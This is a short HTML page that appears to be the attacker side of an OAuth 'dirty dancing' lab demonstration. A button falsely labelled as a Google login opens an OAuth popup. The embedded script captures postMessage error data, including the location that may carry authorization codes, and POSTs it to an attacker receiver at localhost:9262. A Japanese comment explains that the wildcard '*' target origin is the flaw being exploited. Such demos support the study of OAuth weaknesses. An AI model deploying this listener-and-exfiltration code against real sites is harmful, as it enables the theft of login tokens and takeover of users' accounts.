<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>evil Dirty-Dancing</title>
</head>
<body>
  <h1>evil</h1>
  <button onclick="window.open('/oauth', '_blank', 'popup')">googleでろぐいん</button>

  <script>
    // errorページにpostMessageの第二引数に'*'を指定しているため
    // postMessageの情報を取得して、攻撃者のサーバに送信できしまう。
    window.addEventListener('message', (e) => {
      if (e.data.type === 'error') {
        fetch("http://localhost:9262/receiver", {
          method: "POST",
          headers: {
            "Content-Type": "application/json"
          },
          body: JSON.stringify({
            message: e.data.message,
            location: e.data.location
          })
        }).then(res => {
          console.log(res)
        }).catch(err => {
          console.log(err);
        })
      }
    });
  </script>
</body>
</html>